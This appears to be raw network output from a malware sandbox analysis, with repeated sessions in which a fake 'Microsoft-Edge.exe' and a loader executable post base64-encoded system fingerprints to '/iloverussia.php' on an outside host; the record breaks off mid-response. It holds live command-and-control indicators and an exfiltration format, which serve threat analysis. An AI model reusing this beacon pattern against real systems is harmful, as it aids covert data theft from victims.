                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                8192.168.2.449755172.67.187.1004437636C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-09-27 15:42:12 UTC621OUTPOST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                User-Agent: A WinHTTP Example Program/1.0
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Host: eijfrhegrtbrfcd.online
                                                                                                                                                                2024-09-27 15:42:12 UTC626INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:12 GMT
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                x-powered-by: PHP/8.0.30
                                                                                                                                                                strict-transport-security: max-age=31536000;
                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hUSKyITOw1UC32FkDrisax0SCxepZkmbYnGWY%2FDP%2BBl0R453u9NQCzVpW0j2EH%2FpYDrz%2Fig0gLe%2FvbvzsdN1J9DVPe2TXuPgGQwJeKd12KPs0iFUee7lL7OJlsSLpcOFXLm1lPFQGXhk"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8c9c9a2fcf93434a-EWR
                                                                                                                                                                2024-09-27 15:42:12 UTC7INData Raw: 32 0d 0a 0a 0a 0d 0a
                                                                                                                                                                Data Ascii: 2
                                                                                                                                                                2024-09-27 15:42:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                9192.168.2.449757172.67.187.1004431748C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-09-27 15:42:13 UTC621OUTPOST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                User-Agent: A WinHTTP Example Program/1.0
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Host: eijfrhegrtbrfcd.online
                                                                                                                                                                2024-09-27 15:42:14 UTC626INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:14 GMT
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                x-powered-by: PHP/8.0.30
                                                                                                                                                                strict-transport-security: max-age=31536000;
                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qnlCE%2FtMMRbW1%2BT0wcab1exauqCXtVQlaFQMezD4qCQ%2BnevDFbQ0BJDyRoct%2FtWEtWy9kdJ2CmZy1Zt0b9xEkP6Rk7lLcDo3AMESEtDR3VOvKbg21Kgwv%2FQTWQQbdSCAyaxlw2q2g04Y"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8c9c9a37bed68c3f-EWR
                                                                                                                                                                2024-09-27 15:42:14 UTC7INData Raw: 32 0d 0a 0a 0a 0d 0a
                                                                                                                                                                Data Ascii: 2
                                                                                                                                                                2024-09-27 15:42:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                10192.168.2.449758172.67.187.1004437636C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-09-27 15:42:13 UTC621OUTPOST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                User-Agent: A WinHTTP Example Program/1.0
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Host: eijfrhegrtbrfcd.online
                                                                                                                                                                2024-09-27 15:42:14 UTC622INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:14 GMT
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                x-powered-by: PHP/8.0.30
                                                                                                                                                                strict-transport-security: max-age=31536000;
                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7HkBdN6PD9BVGUPXO8ckIAwQ%2FIyYoW%2F2d5xjm5iz4k0aX5W9X2ulAAbYzze%2BgkEchIJXCntzKn3TDVCcvQDEYYQpMCfu6ba0mlNFJxvpDYtF0y40fuQUFLWu7T6wVoKChj6Z9qJjBC5x"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8c9c9a37cdfa0f78-EWR
                                                                                                                                                                2024-09-27 15:42:14 UTC7INData Raw: 32 0d 0a 0a 0a 0d 0a
                                                                                                                                                                Data Ascii: 2
                                                                                                                                                                2024-09-27 15:42:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                11192.168.2.449760172.67.187.1004431748C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-09-27 15:42:14 UTC621OUTPOST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                User-Agent: A WinHTTP Example Program/1.0
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Host: eijfrhegrtbrfcd.online
                                                                                                                                                                2024-09-27 15:42:15 UTC638INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:15 GMT
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                x-powered-by: PHP/8.0.30
                                                                                                                                                                strict-transport-security: max-age=31536000;
                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=L%2BHKWZW6cZohcVLe%2Fs6s%2ByOFaLByn%2Bc%2Bz7t2GB%2Bd6bNGuHI6K1JL%2BjrcSin6D0AqTz6ulxG%2Fr7C5zJH3%2F6RQZwu8eAO1wD%2FWfMfdNFWuZRHOJJt87R3ki%2BmFyH2laCvY6SZt2zgiEG60"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8c9c9a400bf24265-EWR
                                                                                                                                                                2024-09-27 15:42:15 UTC7INData Raw: 32 0d 0a 0a 0a 0d 0a
                                                                                                                                                                Data Ascii: 2
                                                                                                                                                                2024-09-27 15:42:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                12192.168.2.449761172.67.187.1004437636C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-09-27 15:42:15 UTC621OUTPOST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                User-Agent: A WinHTTP Example Program/1.0
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Host: eijfrhegrtbrfcd.online
                                                                                                                                                                2024-09-27 15:42:15 UTC626INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:15 GMT
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                x-powered-by: PHP/8.0.30
                                                                                                                                                                strict-transport-security: max-age=31536000;
                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nbkIH0%2BdootVIGjwIb75Zuj8NMFyEfU8LFaJC5vjdIhldx5Pll8Y8QbHKeRy14BQ8%2BelMi3996rcP4ECMaV3wVlnI0DZpC%2F%2B61W7OoosAB144s6r6DtkZCvrnjk0q7o5OOSa%2BpTAeGg0"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8c9c9a406acf78dc-EWR
                                                                                                                                                                2024-09-27 15:42:15 UTC7INData Raw: 32 0d 0a 0a 0a 0d 0a
                                                                                                                                                                Data Ascii: 2
                                                                                                                                                                2024-09-27 15:42:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                13192.168.2.449763172.67.187.1004431748C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-09-27 15:42:16 UTC621OUTPOST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                User-Agent: A WinHTTP Example Program/1.0
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Host: eijfrhegrtbrfcd.online
                                                                                                                                                                2024-09-27 15:42:16 UTC620INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:16 GMT
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                x-powered-by: PHP/8.0.30
                                                                                                                                                                strict-transport-security: max-age=31536000;
                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SUUKkebWmwnawJ7PyGLFxBeu4kqeuIx5fOw6uFdJKIN4X2Ify7l0t68inf3yO5oR2Ph7peeRIcXyp7u%2BgTa1CYftxoeE8pHIl8tC0RM10nxVqUXqBu22yb6G6GZyv%2FvsisBM747Onv1g"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8c9c9a490c8b7d1a-EWR
                                                                                                                                                                2024-09-27 15:42:16 UTC7INData Raw: 32 0d 0a 0a 0a 0d 0a
                                                                                                                                                                Data Ascii: 2
                                                                                                                                                                2024-09-27 15:42:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                14192.168.2.449764172.67.187.1004437636C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-09-27 15:42:16 UTC621OUTPOST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                User-Agent: A WinHTTP Example Program/1.0
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Host: eijfrhegrtbrfcd.online
                                                                                                                                                                2024-09-27 15:42:16 UTC650INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:16 GMT
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                x-powered-by: PHP/8.0.30
                                                                                                                                                                strict-transport-security: max-age=31536000;
                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4ITfMqrJjYN8hMKRoWE2Y0lgLh5zdMtAB98z5X8Gz3s8EImttvy6NIMyDTyTftjBbygUBzlY0qUi07wPZ6THY6CXSD8eVySRsdJP4naar%2FKX8418pztq%2FnWrMV6QVHCptxBZ7WZFoIyM"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8c9c9a48fe3f185d-EWR
                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                2024-09-27 15:42:16 UTC7INData Raw: 32 0d 0a 0a 0a 0d 0a
                                                                                                                                                                Data Ascii: 2
                                                                                                                                                                2024-09-27 15:42:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                15192.168.2.449767172.67.187.1004431748C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-09-27 15:42:17 UTC621OUTPOST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                User-Agent: A WinHTTP Example Program/1.0
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Host: eijfrhegrtbrfcd.online
                                                                                                                                                                2024-09-27 15:42:18 UTC624INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:18 GMT
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                x-powered-by: PHP/8.0.30
                                                                                                                                                                strict-transport-security: max-age=31536000;
                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rkA5JI9JP4nXjxeevEUs6zz9LVcQ0WStTt2Lscz6ROePGD05I5sULeuNU36dyZ%2F51Obk7KFwnkSJtF8nQmz%2F8EH2or4xDWuUY%2FesX9mmoF%2BlXQKqISxUYRBryI2e3E0FYwxgDw97A4xk"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8c9c9a51f8cbc402-EWR
                                                                                                                                                                2024-09-27 15:42:18 UTC7INData Raw: 32 0d 0a 0a 0a 0d 0a
                                                                                                                                                                Data Ascii: 2
                                                                                                                                                                2024-09-27 15:42:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                16192.168.2.449768172.67.187.1004437636C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-09-27 15:42:17 UTC621OUTPOST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                User-Agent: A WinHTTP Example Program/1.0
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Host: eijfrhegrtbrfcd.online
                                                                                                                                                                2024-09-27 15:42:18 UTC620INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:18 GMT
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                x-powered-by: PHP/8.0.30
                                                                                                                                                                strict-transport-security: max-age=31536000;
                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RcJ5gHQhldi7qnfSzWTsr2Cph7NnYYD5QvYz%2FKeqxPcKQ5eLc90iq12cFD7pgNsU0Ff0Pv63AbP0wMPX5%2ByJ6cvBpO391XpskG1LQFK38hCqk0HfskftWzi7MEgifyTYnIyS3cqzqhkt"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8c9c9a524b60726f-EWR
                                                                                                                                                                2024-09-27 15:42:18 UTC7INData Raw: 32 0d 0a 0a 0a 0d 0a
                                                                                                                                                                Data Ascii: 2
                                                                                                                                                                2024-09-27 15:42:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                17192.168.2.449770172.67.187.1004431748C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-09-27 15:42:19 UTC621OUTPOST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                User-Agent: A WinHTTP Example Program/1.0
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Host: eijfrhegrtbrfcd.online
                                                                                                                                                                2024-09-27 15:42:19 UTC622INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:19 GMT
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                x-powered-by: PHP/8.0.30
                                                                                                                                                                strict-transport-security: max-age=31536000;
                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1VwFJHoY9pSp5MbB0t1crhJdmR6yLtTGrv4fjW0e2Uk9HL1aE%2BJfVeqYiWOf%2BK9GaipUzI8fboCA7QweG2Ya3H4ltL5hVUN8hMsms8o4coUnbcgiraFcReTniXtpr7%2FEtyFaVphv5Kll"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8c9c9a59accd8c96-EWR
                                                                                                                                                                2024-09-27 15:42:19 UTC7INData Raw: 32 0d 0a 0a 0a 0d 0a
                                                                                                                                                                Data Ascii: 2
                                                                                                                                                                2024-09-27 15:42:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                18192.168.2.449771172.67.187.1004437636C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-09-27 15:42:19 UTC621OUTPOST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                User-Agent: A WinHTTP Example Program/1.0
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Host: eijfrhegrtbrfcd.online
                                                                                                                                                                2024-09-27 15:42:19 UTC624INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:19 GMT
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Transfer-Encoding: chunked
